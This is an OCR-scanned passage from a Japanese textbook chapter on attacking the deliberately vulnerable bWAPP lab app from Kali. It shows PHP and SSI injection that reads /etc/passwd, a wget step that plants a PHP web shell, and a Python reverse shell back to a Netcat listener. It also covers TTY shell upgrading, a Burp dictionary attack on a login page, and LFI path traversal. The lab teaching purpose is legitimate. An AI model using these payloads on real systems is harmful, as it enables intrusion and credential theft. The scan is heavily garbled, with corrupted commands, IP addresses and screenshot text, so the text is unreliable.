実行 時 の パス ワー ド は "bug' に な り ま す 





| 第 7 章 | 学習 肌 ア プリ に よる Web ア プリ の ハッ キン グ 627 


①bWAPP に ログ イン する 

プラ ウザ で http://1000.103/bWAPP に アク セス し ます 。 こ こ で は ホス ト OS 
(IP アド レス は 100.0.1) の プラ ウザ を 用 いま す ("12)。 認証 画面 が 表示 され る の で 、 
次 の よう に 指定 し て [Loginm] ボタ ン を 押し ます 。 


* Login : bee 
* PaSSWOrd : Dug 


s Security level : low 


② 「PHP Code Injection」 の ペー ジ を 表示 する 


右上 の 「Choose your bug] の プル ダウ ン メ ニュ ー で 、「Al - Injection」 内 の 
「PHP Code Injection」 を 選択 し て [Hack] ボタ ン を 押し ます 。 す る と 問題 ペー ジ 
が 表示 され ます ( 図 7-24)。 


/ PHP Coge Iniection / 


Thia i3 jU9t pn te3t PO で 「e で cctnq back your me3339e 





図 7-24 「PHP Code Injection] の ペー ジ 


3 URL を 変更 し て 挙動 を 確認 する 
|message」 リ ンク を 押し ます 。 する と 、URL が |http://10.0.0.103/bWAPP/phpi. 
php?message=test| に な り 、 リ ンク の 下 に test' と いう 文字 列 が 表示 され ます 。 
URL を |「http://10.0.0.103/bWAPP/phpiphp?zmessage=hello」 に 変更 し て 、 ア ク 


*12 : Microsoft Edge だ と 特別 な 設定 を し な いと アク セス で きま な い の で 、 そ れ 以 外 の プラ ウザ 
(Chrome な ど ) を 用 いて くだ さい 。 
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セス し て み ま す 。 す る と 、"test' の 代わ り に "hello' と 出力 され ます 。 
以上 の 挙動 か ら 、「message=」 以降 の 文字 列 が Web ペ ー ジ に 反映 され て いる と 
推測 で きま す 。 


(④①PHP の 設定 内 容 を 一 覧 表示 する 

phpinfo() と は 、PHP の 設定 内 容 (( パ バー ジョ ン 情 報 や 設定 ファ イル の パス な ど ) を 
一 覧 表示 する 、PHP の 関数 で す 。URL を |http://100.0.103/bWAPP/phpiphp? 
message=phpinfo()|」 に 変更 し て 、 ア クセ ス し ます 。 す る と 、phpinfo() の 出力 結果 
が Web ペ ー ジ に 埋め 込ま れ た 形 で 表示 され まし た ( 図 7-25)。 


/ PHP Coge IniecTion / 


This js juSt a test page, reflectinq baCk your messadG-... 





7-25 phpinfo() の 出力 結果 が 表示 され た 





ここ で 重要 な の は 、"phpinfo() と いう 文字 列 が 表示 され た の で は な く 、phpinfo() 
の 出力 結果 が 表示 され た と いう こと で す 。 こ の 事実 か ら 、Web ペ ー ジ に phpinfo() 
が 埋め 込ま れ て 、 そ の 実行 結果 が 表示 され て いる と 推測 で きま す 。 


(5)Linux カー ネル の バー ジョ ン を 確認 する 
それ で は 、 別 の PHP 関 数 を 試し て み ま す 。system() 関数 は 、 引 数 に 指定 し た コ 
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マン ド を 実行 し ます 。 例 えば 、「system(cat /proc/Version):」 は 、"/proc/Version" 
ファ イル を cat コ マン ド で 表示 し ます 。 こ れ を 「message=」 の 後ろ に 書き 込ん で 
実行 し て み ま す 。 つ まり 、「http://10.0.0.103/bWAPP/phpiphpzmessage=system 
(cat /proc/version:」 に アク セス し ます ("13)。 す る と 、 図 7.26 の よう に 表示 され 
ます 。 


/ PHP Coge Iniecion / 


This is just a test Dacie, 「eekchnq back your message 


LO VeVSKOn 2 6 27-76-9e7ieyiC (DOOODDa/miey) (CC veysion 237UDunf/ す 2 3-24Dunfp/7 が 7 SM だ カリ Apr 70 
73.23 す 42 り 7C 2006 Limux Version 2.6.2 す 76-oenerc (Du の paime り (gcc Version 23( り buny す 23-2u5on7) 
#7 SMD 了 pu Apy 70 73.23 42 7C 2008 





図 7-26 "/proc/version'* ファ イル の 内 容 が 表示 され た 


改行 され て お ら ず 見 づら いで す が 、"/proc/version" フ ァイル の 内 容 が 表示 され 
まし た 。 改行 きれ て いな い の は 、cat /proc/version コマ ンド の 出力 結果 に 改行 タ 
グ が 含ま れ て いな いた めで す 。 


⑥ ユーザー 名 を 列挙 する 

より 機密 性 の 高い 情報 に も アク セス で きそう で す 。 残念 な が ら 、"/etc/shadow" 
ファ イル の 内 容 が 表示 で きま せん 。「http://10.0.0.103/bWAPP/phpiphp?message 
=system( cat /etc/passwd:」 に アク セス する と 、"/etc/passwd ファ イル の 内 容 を 
表示 で きま し た ( 図 7-27)。 


*13 : [message=l:system(cat /proc/version》| の よう に 、 セ ミコ ロン 以降 に コマ ンド を 入力 する 
パタ ー ン も あり ます 。 
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/ PHP Coge Iniecioh / 


ThIS IS USt a eSt Dag で , 「eflecting Dack your mesSSad@.. 


7o0「 ア 0 せ roof/roo た や mg5 れ OagenTon ア イイ daernon7 ル US の Sbn 7 の ry/5 れ pin アブ.D 息 7DMm/s カ 
SYS.x.3.3.SyS/Oev/DiryS カ SymCx.3.65534 src の bm 人 DrySyrC 987eS_x.5.60 ogarmeS./US798rmeS-Dy/S か 
Wa 72Z rnagrn/ ル ag/CgCe7mg7 7 の ryG カ 訪 メ アア 加 . ル g07SDOOW7D7 jry6 カ ax rmag/ ん ag の ir ぶさ か 
neWSX.9.9 neWS プ V87SDOOWnewS プ DS れ UUCPX70770.uucp- ル 8/SpoCWUucp- の DS ル 
prOXYY 7373Jyoxy/Din DVS WWW-gia yr 33 33 www-da(a ん ag の Mswy 選ぶ ルカ 
め aCrupX づ すず 34 の ackp Ma7 わ acKkuDS nm/5 カ sr.36 3 は -/aing 57 Wanager ル aiS わ DVS 
CX.39.39jrCd ん ar/fu7yrCd7 の jrS7 gnagsx.474 ナ GngS Buo-Reportm Sysfem (8 ん grb/gna(S- も VS カ 
n0007y7 6553 す 6553 イ mob /nOrne7Sferf / か Jr Mu の ァ イ 00 70f ん ah7WD urd / の Ds 





図 7-27 "/etc/passwd" ファ イル の 内 容 が 表示 され た 


当然 な が ら シ ャ ドウ 化 さ きれ て いる の で 、 こ の ファ イル か ら は ユー ザー 列挙 ぐら 
いし か で きま せん 。 し か し 、 か な り 具 づら いと いえ ます 。 そこ で 、 テー ザー 名 だ 
け を 抽出 し ます 。 URL に は 「http://10.0.0.103/bWAPP/phpiphp?message=system 
(cut -d: -f1 /etc/passwd):| を 入力 し ます ( 図 7-28) 。 


/ PHP Coge Inecioh / 


This IS USt 3 1eSt paQe. 「efIectnq back your mesSage@... 


や Of daemon SYS Si の C 937YeS の 8n ma0 neWS OUCD DIOXY WWW-Oa(3 b3CKUD が SE /C gn2S noO6Od/ Duu77 
OfiCD SVSIOO fOd カ nWD gi-9U0IOD7 OO DISe re で SSaOC の US gVg 太 DO 販 WUSG7 ル 8M7geyTOoyi Dee myS「 SS が 7 OOveCo/ 
Smmf は SmmSn GO gcG 如 Or woverne JODnn ア SG 由 nG DoS profpd か snmmp np np 





図 7.28 ユー ザー 名 の 列挙 


7?) そ の 他 の コマ ンド を 試す 
情報 収集 に は 、 次 の よう な コマ ンド も 使わ れる の で 、 試 し て み ま し ょ う 。 


* hostname 

* Whoarmi 

* Dwd 
*/Sbin/ifconfig 


誠 SS| イ ンジ ェクション に より Web シェ ル を 設置 する 
SSI イ ンジ ェクション と は 、SSI (Server-Side Includes) に よる HTML 生 成 に 干 
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渉 す る 攻撃 で す 。 


1① 「Server-Side Includes (SSI) Injection] の ペー ジ を 表示 する 

右上 の 「Choose your bug] の プル ダウ ゥ ウン メニ ュー で 、「 Al - Injection」 内 の 
IServer-Side Includes (SS1) Injection」 を 選択 し て [Hackl ボタ ン を 押し ます 。 す 
る と 問題 ペー ジ が 表示 され ます ( 図 7-29)。 


/ Server- ら ge Includes (らら |) Iniechon / 


What i5 Your IP address7 LookuD your IP address . (bee-box only) 


First name 
| 


LaSt n3me- 


= 





7-29 「Server-Side Includes (SSI) Injection] の ペー ジ 


②First name と Last name を 入力 し て 挙動 を 確認 する 
First name 欄 と Last name 欄 に 色々 入力 し て み ま す 。 


Hello Hello Hello, 
First name 欄 





出力 の 1 行 目 は "Hello ?? ??" と いう フォ ー マ ッ ト で あり 、1 番 目 の ?? に は First 
name 欄 に 指定 し た 文字 列 、2 番 目 の ?? に は Last name 欄 に 指定 し た 文字 列 が 表示 
され て いる と 推測 で きま す 。 た だ し 、 頭 文字 は 大 文字 に 変換 され て いま す 。5 行 目 
に は ホス ト OS の IP アド レス で ある "100.0.1" が 表示 され て いま す 。 

次 の よう な 入力 を 与え て み ま し た 。 
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Hell /Var/ /bWAPP , 


Your IP addreSs IS: 
Last name 欄 く !-#eXeC Cmd="DWd" --> 





10.0.0.1 


1 番目 の ?? の 位置 に は "bee-box"、2 番 目 の ?? の 位置 に は パス が 表示 され まし た 。 
指定 し た コマ ンド の 結果 が 表示 され た こと が わか り ま す 。 よ っ て 、pwd コ マン ド 
の 出力 より 、 カ レン トディ レク トリ が "/var/www/bWAPP" と 判明 し まし た 。 


③⑬ リ バー スシ ェ ル を 外部 か ら ダ ウン ロー ド で きる よう に する 

Kali の 「/usr/share/webshells' ディ レク トリ に は Web シ ェ ル が 言語 別に 分 けら 
れ て 格納 され て いま す 。 こ れ を bee-box に 配置 し て バッ ク ド ア に する こと を 目標 
に し ます 。 そ こ で 、PHP で 書か れ た Web シ ェ ル を 外部 か ら ダ ウン ロー ド で きる よ 
うに し ます 。 


root 泡 a1i:<# CD /usF/share/webshe11s/php/php-backdoor.php /var/www/htm]/ 
roota11:<# cd /vVar/www/htm1/ 

roota11 : /var/www/htm]# 1 

index.html index.nginx-debian.htm] php-backdoor.php sq1i-1abs-php7-master 
root 騙 a11 : /var/www/htm]# cp php-backdoor.php php-backdoor.php .txt 

root 凡 a11 : /Vvar/www/html# service apache2 start 


④ 別 の 端末 か ら Kali の ファ イル に アク セス で きる か を 確認 する 

別 の 端末 か ら 、Kalii の ファ イル に アク セス で きる か を 確か め ま す 。 ホ スト OS の 
Windows の プラ ウザ か ら http://10.00.2/php-backdoorphp.txt に アク セス し ます 
(*14)。 PHP の ソー ス が 表示 され れ ば 、 問 題 な いこ と が わか り ま す 。 


*14 : Windows か ら こ の URL に アク セス する と 、 ウ イル ス 検 知 が 働き ます 。 こ れ は ウイ ルス の 
コー ド が 引っ 掛か っ た だ け で あり 、 感 染 し た わけ で は あり ませ ん 。 





| 第 7 章 | 学習 用 アプ リ に よる Web ア プリ の ハッ キン グ ブ 633 


(5) Web シェ ル を 転送 する 
プラ ウザ か ら 次 の よう に 入力 し ます 。 


<!-- き XeC Cmd="wget http://10.0.0.2/php- Hello Test, 
backdoor.php.txt -O /var/www/bWAPP/ 


web_shell.DhD" --> Your IP addreSSs IS: 


10.0.0.1 





表示 上 は 指定 し た 文字 列 だ けが 表示 され 、wget の 実行 結果 は わか り ま せん 。 ダ 
ッ ウン ロ ー ド が うま くい っ て いれ ば 、 外 部 か ら ア クセ モス で きま す 。 プラ ウザ で 
http://10.0.0.103/bWAPP/web_shellphp に アク セス する と 、Web シェ ル が 表示 さき 
れ ま す ( 図 7-30) (C15) ("16)。 


を ) ① | 192 168.56.10LbWWAPP/web-shellphp 


こ テ ー 
ーーー ャ ら で と で ミュ ニン 
3 8 1 こ に みて W い : ー { 
- ブ ーー ーー リア ーー ニーー- ーー トー。 ーー ミア テコ rr コー キャー ンー Fr た て p ーー エー ー エ ii ロ ro は 2 nir ーーーー-ー ロー mr mam awa po 4 ・ ーー エロ ウー テー ュ 旨 】 
ーー ーー アテ 内 デ Pe 相 』 
> の ーー risse 当 





uploed file: 。 Browse | No file selected. 


t0 brOwse Q0 to http://7d=[directory here] 


for asxanple: 
http://?d=/etc on *nix 
Or htSD://fd=c:/ ハ ndows on win 


EXCCUKC WY50L qUe「Y: 


| 








図 7-30 "php-backdoor.php" の メイ ン 画 面 


*15 : 何 も 表 示さ れ な い 場 合 は 、bee-box 内 の "web _shellphp' ファ イル 内 が 空 の 可能 性 が あり ま 
す 。 ログ イン し て 確か め て みて くだ さい 。 例え ば 、Kali か ら 正 常に ダグ ダウンロード で き な い 場合 は 、 
空 フ ァイル に な り ま す 。 


*16 : | execute command」 欄 に コマ ンド を 入力 し て 、 [go] ボタ ン を 押す と 、 実 行 結 果 を 確認 で き 
ます 。 例え ば 、IP ア ドレ ス を 確認 する 場合 に は 、 "jonfg'" と 入力 する の で は な く 、"/sbin/ 放 onfig" 
の よう に バス を 付け た 状態 で 実行 し ます 。 な お 、 最初 の 画面 に 戻る 場合 に は 、 プ ラウ ザ の 戻る ボ 
タン を 使い ます 。 
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⑥)bee-box 上 で リバ ー ス シェ ル を 起動 する 
Web シェル を 通じ て 、 フ ァイル の アッ プロ ー ド や ダウ ン ロ ー ド が で きま す 。 ま 
た 、Web シェ ル の 権限 で 任意 の コマ ンド を 実行 で きま す 。 し か し 、 コ マン ド の 結 
果 は Web ペー ジ で 表示 され る の で 、 コ マン ド 入 力 と 戻る ボタ ン を 繰り 返す こと に 
な り ま す 。 こ れ で は 少し 不便 な の で 、bee-box 上 で リバ ー ス シェ ル を 起動 し ます 。 
Kali で Terminal を 起動 し て 、Netcat が ボー ト 4444 で 待ち 受け る よう に し ます 。 


Foo て 引 ka11i:<# nc -nlvp 4444 
1istening on [any] 4444 ... 


Web シェ ル の |execute command」 欄 に 次 の コマ ンド を 入力 し て 、 [go] ボタ ン 
を 押し ます 。 する と 、 リ バー スシ ェ ル が 起動 され 、bee-box か ら Kali に 接続 し ます 。 


python -c 'import socket, subprocess,os:s=socket . socket( socket . 
AF _TNET, socket.SOCK_STREAM) : s . connect( ("19.9.9.2",4444) ) : os .-」 
dup2(s .fil1eno( ) ,9) : os.dup2(s.fi1eno( ) ,1): os.dup2(s. | 

†ileno( ) , 2) :p=subprocess.ca11(["/bhn/sh"」"- ュ "|):) 


Kali 側 で 次 の よう に Netcat が 反応 し ます 。 


Foot 仙 Ka11:<# nc -nlvp 4444 

1istening on [any] 4444 ... この 行 以降 が 出力 され る 。 
connect to「19.9.9.2] from (UNKNOMN ) [19.9.9.193] 49888 

/bin/sh: can't access tty: ]ob control turned off この メッ セー ジ に 注目 。 


$ 

$ whoami 

www-data 

$ pwd 

/var/www/bMAPP 

$ id 

Ui1d=33( www-data ) gid=33(www-data ) grOuDS=33( www -data ) 








プロ ンプ ト が 返っ て き て 、 コ マン ド を 入力 で きま す 。 こ れ で ター ゲッ ト 上 端末 を 
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ある 程度 掌握 し た こと に な り ま す 。 


? TTY シェ ル を 奪取 する 
この プロ ンプ ト で 、"cd ap” に 続い て [Tab] キー を 押し て みて くだ さい 。 


$ cd ap 9 県 を EE ヒエ ラス gr 


Tab 補完 は され ず 、Tab (いく つか の 空白 ) が 入力 され た だ け で す 。 あ る 意味 で 
不 完全 な シェ ル で あり 、 コ マン ド 入 力 の 効率 性 が 下がる と いえ ます 。 そこで シェ 
ル の アッ プ グ レー ド を 目指 し ます 。 

Python の pty.spawn() を 使う と 、 外 部 コマ ンド を 実行 で きま す 。 引数 に "/bin/ 
bash を 指定 する と 、bash を 起動 で きま す 。 そ こ で 、 次 の よう に 入力 し て 、TTY 
シェ ル を 作り ます ("17)。 こ の テク ニッ ク は 、 プロ ンプ ト が 返っ て こない シェ ル を 
稚 取 し た 場合 に 有効 で す 。 


$ python -c "import pty: pty.spawn("/bin/bash" )” 
www-data 人 Qbee - box : / var/www/bMAPP$ "/bin/bash" が 起動 する 。 





www-data@bee-box : / var/www/bMAPP$ id 





1d 入力 し た コマ ンド が 表示 され る が 、 無 視 し て よい 。 
u1d=33( www- data ) g1d=33( www- data) grOuDs=33( www-data ) 
コマ ンド の 出力 も 表示 され る 。 





先ほど と 同じ く 、"cd ap" に 続い て [Tab] キー を 押し て み ま す 。 


*17 : ター ゲッ ト 端 末 の 環境 に も より ます が 、 次 の よう な コマ ンド で も 同様 の 結果 が 得 ら れ ま す 。 


$ echo os.system(”/bin/bash' ) 
$ /bin/sh - ュ 

$ per] -e "exec "/bin/sh":" 

$ per1: exec "/bin/sh": 
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Tab 補 完 さ れ ま せん で し た 。 そ こ で 、【Ctrl] + [z] キー を 押し て 、 シ ェ ル を 
パッ ク グ ラウ ンド に し ます 。 





次 の よう に 入力 し て 、 シ ェ ル の 設定 値 (Terminal の 名 称 、 行 サイ ズ 、 列 サイ ズ 
な ど ) を 確認 し ます 。 





次 の コマ ン ド を 入力 し ます 。 
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Foott 個 ka11 : < 草 st て ty Faw -echo 
gl で Bm まま: 半 還 較 bam キー を 入力 し て も 表示 され な い が 、"fg" を 入力 し て [Enter] キ ー を 押す 。 





する と 、 次 の よう に 表示 され て 、 シ ェ ル が フォ アグ ラウ ンド に な り ま す 。 ここ 


で 、reset を 人 入力 し ます 。 Terminal type? と 表示 され た な ら 、[Ctrll + [cl キ - 


Ln 


押し て 、Netcat の シェ ル に 戻り ます ( 図 7-31 ) 。 


選 





root 人 MKka11:<# nc -nlvp 4444 上 記 の fg を 入力 し た と ころ に 表示 され る (入力 し た わけ で は な い )。 
reset カー ソル が ここ に 移動 し て お り 、"reset" を 入力 する 。 


reset: unknown terminal type unknown 


Terminal type? ここ で [Ctr1] 土 [c] キ ー を 押す 。 


Mww-data 仙 Dee - box : /var/www/bMAPP$ Netcat の シェ ル に 戻り 、 プ ロン プ ト が 表示 され る 。 








TIEEIES す Il 引き 生 た まき AD リリ ォ リ リリ リリ 2 
[1]+ StODDed InC -nLVD 4444 

・- GChO STERIM 
ちる 5EP ホ 1Tqvitrj 

Hg うす 
| 384GO baud: rowvs 24: colLumns 80: Ll 一 2 
1ntF = “の C: U1t = の \: eTaSe = ニ ブリ: K1LL = グリ U: GO0f 三 D: eOlt ニニ <unOdef> : 
eO【2 = <uridef>: SwtCh = <undef>: Start = “0: StOD = “S: SUSD ニ Z: 『FDFIt 
xc ① こ の コマ ンド を 入力 する と 、 次 の 行 に プロ ンプ ト が 表示 され ます 。: 

PD し か し 、 キ ー 入 力 し て も 表示 され ませ ん 。 


od 四 キ 1c9 呈 : 


見え ない まま 、"fg" を 入力 し て 、【[Enter] キー を 押し ます 。 ncr 1Crnl ixon -1xoff 


EBIIGS GE ま まで 11「 且 E ま EE ます 1 ココ ERUIGI] 
ODOSt -OLCUC -OCFnL OnWCF -OnOCF -OnLFet -0f1LL -OfOHeL ntG CFO tabO9 DSO VtO ffGO 
1S1 ロ 1CanOH 1exXten ech echoe echok -echonl -nofLsh -XCcase -tOostoD echODI[t 
echoctL echoke -fLusho XtDFo て ② 上 の プロ ンプ ト 以 降 は 自動 的 に 表示 され ます 。 
ES 寅 FY7 誠 di ノン この 位置 に カー ソル が 移動 し て いま す 。 
- 孝 nC -nLVP ング "reset'" を 入力 し て 、【[Enter] キー を 押し ます 。 








③ 【Ctrl 二 [c] キー を 入力 し ます 。 
図 7.31 TTY シェ ル の 取 
この よう に ジョ プ ブ を 制御 する に は 、fg コ マン ド や bg コマ ンド を 用 いま す 。 そ の 


結果 、 ジ ョ ブ の 状態 は 、 図 7.32 の よう に 乱 移 し ます 。 
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普通 に コマ ンド 実行 & を 付け て コマ ンド 実行 





[Ct] 十 [z] ey 
に Mi ン < 
呈 コ アッ 一 覧 表示 


fq コ マン ド 


図 /.32 ジョ ブ の 制御 


export コ マン ド で 、 シ ェ ル を 設定 し ます 。 さ ら に 、 先 ほど 取得 し た 設定 値 を 設 
定 し ます 。 


www-data 仙 Dee - box : /var/www/bMAPP$ export SHELL=bash 
www-data 合 Dee - box : /var/www/bMAPP$ export TERM=xterm-256color 
www-data 同 bee - box : /var/www/bMAPP$ stty rows 24 columns 89 


Cd ap に 続い て [Tab] キー を 押し て み ま す 。Tab 補 完 さ れ て "apps/′ と 表示 
され ます 。 





www- ata 人 Qbee- box : /var/www/bMAPP$ cd ap 続け て 、[Tab] キ ー を 押す 。 


Tab 補 完 さ れ ま し た 。 以上 に より 、 Netcat 経 由 で 完全 に 機能 する TTY シェル を 
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8) シェル を 抜け る 
extt コ マン ド で シェ ル を 抜け られ ます 。 も し 応答 が な く な っ た ら 、Terminal の 
[x] ボタ ン で 閉じ ます 。 


沙 認証 ペー ジ に 対す る 辞書 式 攻 撃 
認証 ペー ジ を 辞書 式 攻撃 する ツー ル は 色々 あり ます が 、 こ こ で は Burp を 使っ た 
方 法 を 紹介 し ます 。 


1) 「Broken Authentication - Password Attacks] の ペー ジ を 表示 する 
Kali の Firefox を 起動 し ます 。 右上 の 「Choose your bug]」 の プル ダウ ン メ ニュ ー で 、 
|A2 - Broken Auth. を Session Mgmt.」 内 の | Broken Authentication - Password 
Attacks」 を 選択 し て [Hack]」 ボタ ン を 押し ます 。 す る と 問題 ペー ジ が 表示 され ま 
す ( 図 7.33)。URL は http://10.0.0.103/bWAPP/ba_pwd_attacks_lphp に な り ま 





す 。 
/ Broken Auth - Pgssworgd ATtoc ヒ = / 
Enler Voui Credenbals (bee の uo) 
図 7-33 「Broken Authentication - Password Attacks」 の ペー ジ 
② ログ イン を 試み る 


認証 画面 の Login に "test'、 Password に "test を 入力 し て 、 [Loginm] ボタ ン を 押 
し ます 。 す る と 、[Login] ボタ ン の 下 に "Invalid credentials! Did you forgot your 
password? と 表示 され ます 。 
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3 Burp で HTTP 要 求 を 捕捉 する 

Burp を 起動 し 、Firefox が Burp を 介する よう に 設定 し ます 。Burp の 「Proxy」 
タプ に て |Intercept is on]」 に し ます 。 こ の 状態 で 、Login に test 、Password に 
"test' を 入力 し て 、[Login] ボタ ン を 押し ます 。 

する と Burp に HTTP 要 求 が 捕捉 され ます 。 [Action] ボタ ン >「Send to 
Intruder」 を 選び ます 。 そ の 人 後 、「Intercept is off] に し て お きま す 。 


④ ホ ジ シ ョ ン を 設定 する 

Burp の |Intruder」 タブ > | Positions] タブ を 開き ます 。【[Clear S] ボタ ン を 押 
し て 、HTTP 要 求 の ポジ ショ ン を すべ て 解除 し ます 。[「login=」 以降 の "test' を 選 
択 し て 、 [Add S] ボタ ン を 押し ます 。 次 に 、 | password=」 以降 の "test を 選択 し 
て 、[Add S] ボタ ン を 押し ます 。 こ れ で 2 つの ポジ ショ ン が 設定 され まし た 。 さ 
ら に 、「Attack type」 を 「Cluster bomb」 に 変更 し ます ( 図 7.34)。 











Burp Suite Community Edition v1.7.32 - Temporary Project 


9urp Intruder Repeetsr Vindow Fielp 


L] Paylnad Pos 放 inns 


Corfigurc te posItIOnS where PSYyIOads will be Inserted IntO ThC bOSC「cQuCSt Thc attock typ で Octcrmincs hc woy In which poylosds 
き 「 で gssaqned bo payload posihons - see help for full Getais- 


eo eeersms | 


FP05T /bMAPP/ba Pe ae 1.php HTTP/1.,1 

Nost: 192.168.56 。 

ser - 有 gent rtet ャ 0 [X11: Linux あき 6 4: Tvi52.6) CeCko/26100101 Firefox/52 .0 
と CC で P そ で: 上 ex そ /htmWt LaPP1S て at で ion/xhtnl+ Xn appLiCatSon/xml: q=O 3. バア /*: ロ =D E 
ccept・Laneuage: eh・U5.eniesO.5 

当て CePt -Ehc6Gin9: 9Z1D. defiate 

Referer: http://192.166 .56 .101/bMAPP/ba pwd ettacks 」.php 

Cookie: PHPSESST0=55797e23342699808e1435414458fe46: _security_ level=0 
Lonne と そ ュ om: と て Lose 

pgFewde・ ユ ns で SUFe・ReQuestsi 1 

Content- Type: ap011Cat3on/x-W-f6rm-urlencoded 

[ontemt-Length: 


on test&pas cuord-5 せ es きら form-submst 


login と password の 値 に 辞書 内 
の 文字 列 が セッ ト さ れ ま す 。 








2 paYiesd Pos mons Length- 5 ナ 4 





7-34 Positions タブ (設定 後 ) 
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⑤ 辞 書 を 作成 する 

続い て |Payloads] タブ を 押し ます 。 |Payload set] で 1 が 選ば れ た 状態 で 、 
|Payload Options」 の [Add] ボタ ン の 右 に ユー ザー 名 の 候補 文字 列 を 入力 し ます 。 
[Add] ボタ ン を 押す こと で 追加 で きま す 。 こ こ で は 、Proot 、bee 、john 、alice' 
を 追加 し まし た 。 

さら に 、|Payload sets」 で 2 が 選ば れ た 状態 で 、「Payload Options] に て パス 
ワー ド の 候補 文字 列 を 追加 し ます (追加 方 法 は 上 記 と 同じ )。 こ こ で は 、"pass 、 
"password'、 toor 、 admin 、 1234 、"bug 、 1111"、 test を 追加 し まし た ( 図 
7-35) 。 








_Burp jntruger Repcater Window Help 


Tsrset | Pesors memdml perI や 5 や 55 に 555Kw ね BS -† キ hb{khb① サ ゅ ウラ ウ | ウ Kk| : 0 


ケー ーーーーーー ーーーーーーー 一 ーーー ーーーーーーーーーーーーーーーーーーーーー ーー ーー ーー ーー 一 ーーー 





|?」 Payload Sets 


You Can deline one or mofe Daylcad sets The number of payload ses depemds on he attack pe defimed in he PosiUons tab. 
Varipss Payioad types are avallable or each payload set. and earh payload Ipe て am be て mstpmicred in different ways 





Payiead cosnt B 


Request couint・ ヨ コメ 


Payload Optons [Simple list] 


This payload type les you conligure sa simile list gf strings hat are used es payloads。 








Add from lgt -… 【Pro version only] | 





?) Payload Procowsing 
You Can deline rulss to peiforrm warlQus ProcessinQ は sks on each payI9sd belore ls used. 





7-35 Payloads タブ (設定 後 ) 


6 辞書 式 攻撃 を 実行 する 
[Start attackl」 ボタ ン を 押し ます 。 す る と 、 ボ ポジション に 対し て 辞書 の 文字 列 を 
代入 する 形 で 、 辞 書式 攻撃 が 行わ れ ま す 。 
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一 番 下 に 進捗 バー が 表示 され ます 。 す べ て の パタ ー ン が 終わ る と "Finished' と 
表示 され ます 。 

Length の 値 に 注目 し ます 。 大 多数 の 攻撃 は 失敗 レ て いる の で 、 そ の HTTP 応 答 
の Length は 同じ 値 に な る は ず で す 。 こ れ と 異な る 値 が あれ ば 、 攻 撃 に 成功 し た と 
考え られ ます 。 確認 する と 、1 行 だ け 異な る Length 値 が あり まし た 。 こ の と き の 
Payload1 は "bee"、Payload2 は "bug' で す ( 図 7-36) 。 


essees reosds | omom | 
eeesaie =。=。。、、、 、 |@ 


Ok 


に 
ロ 
ロ 
ロ 
ロ 
剖 
ロ 
癌 
り 
人 末 
コ 
ロ 
ロ 
ロ 
っ 


BOOGOOeeeC6CCOGE 


9ST 557bs pd s tttecka- 1.php HTTP/ ミ 、1 
Ss そ : 192.16B .5 
3 で 「・AGeIt : atNte/5 9 (X1』: Lknux x86_69: rvi52.01 ーー Fre'ox/33.6 
CC で D そ で : て で xX そ /htnt.anptication/xhtnt+xnt 084 3=0 93、9/*:qeB.8 
CCept -Langua9ei で h-US.eni し あ 5 
SC で で Dt・EhcOdsngi 9 ミ Xp、 deftgt 
RefeFer: 0CtB1750。18896.161/MNPJb pud attacks 1.Php 


本 (所 1 白村 


Finishegd 





図 7-36 辞書 式 攻撃 に 成功 し た 


⑦ 解 析 し た ID と パス ワー ド で ログ イン する 

問題 の ペー ジ を 表示 し 、 Login に "bee"、 Password に "bug′ を 入力 し て 、 [Login」 
ボタ ン を 押し ます 。 する と 、 [Login] ボタ ン の 下 に "Successful login!" と 表示 され 、 
ログ イン に 成功 し まし た 。 


妙 LFI で PHP シェ ル を 設置 する 


FI (File Imclusion) と は 、Web ア プリ の 入力 検証 の 不備 を 突い て 不正 な ファ イ 
ル を 読み 込ま せる 攻撃 で す 。LFI (Local File Inclusion) と RFI (Remote File 
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Inclusion) に 分 類 さ れ ま す 。LFI は 、 タ ー ゲ ッ ト 端 末 上 の ファ イル を 用 いま す (*18)。 
一 方 、RFI は 、 攻 撃 者 が 用 意 し た 遠隔 に 位置 する ファ イル を 用 いま す 。 


① 「Remote & Local File Inclusion (RFI/LFI)] の ペー ジ を 表示 する 

右上 の [Choose your bug] の プル ダウ ン メ ニュ ー で 、| A7 - Missing Functional 
Level Access Control」 内 の 「Remote 層 Local File Inclusion (RFL/LFT)」 を 選択 
し て 、[Hack」 ボタ ン を 押し ます 。 す る と 問題 ペー ジ が 表示 され ます ( 図 7-37)。 


/ Kemote ん Locgl Fie Inclusion (KKF/L ロ ) / 





Select a 1anUdde | EIJISh M | | Go 」 


図 7-37 「Remote & Local File Inclusion (RF/LFD]」 の ペー ジ 


② ホ タン を 押し た と き の URL を 確認 する 

「English| を 選ん だ 状態 で [Co] ボタ ン を 押す と 、 下 部 に "Thanks for your 
interest in bWAPPI と 表示 され まし た 。 こ の と き の URL は 、「http://10.0.0.103/ 
bWAPP/rlfiphp?language=lang_en.php&action=go|] と な っ て いま す 。 つ まり 、 
Jang_enphp ファ イル が 実行 され て 、 そ の 結果 が 表示 され た と 推測 で きま す 。 


3③)LFI を 実行 する 

それ で は URL を 編集 し て LFI を 試み ます 。 |http://10.0.0.103/bWAPP/rlfiphp? 
language ニ =.…/././etc/passwd| と いう URL に アク セス し て み ま す 。 す る と 、bee- 
box か ら 見 て ロー カル ファ イル で ある "/etc/passwd' ファ イル に アク セス され 、 
その 内 容 が 表示 され ます ( 図 7.38)。 よ っ て 、LFI の 脆 能 性 が あり ます 。 


*18 : 定義 で 考え を る と 、 デ ィ レ クト リト ラバ ー サ ル は LFI を 含ん で いま す 。 特 に 、 タ ー ゲ ッ ト で あ 
る Web アプ リケーション が 用 いて いる スク リプ ト 言 語 の include 系 の 関数 で ファ イル を 読み 込ん 
で いれ ば 、LFI に 該当 し ます 。 
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を ) ① | 192.168、56.102/bWAFP/rUR php?lsnquaqe =.// etC/PassWd E コ | ご Search 
局 Most Visitedy 症 Offcnslve Secuntyr KallLnux Kal Docs Kall Tools s Explot-DB 坦 Arcrack-ng MKal Forums NetH 


ww 


on exTremely u42Y we レ の PP 


し に ロ 1 戸 し ホ : に 【 


/ 尽 emote ん Locgl Fie Inclusion (ビル レロ ビリ) / 


Select a ancuage: | Enqlish (Go 


rooEx:O:OrrootC/rootybmbash daemonx:1:daemonJAsSr7sbn7bimWsh bn:x:2-2:Din リ bin: 有 Dish sys:x:3:3:sys dev- 
bish syrccx:4④65534:SyrC./DIm:iWSync demeS2x:5.60.qerieSJuS(/9aumesS:bish mamn:x:6:12.mawn:var/cCache 
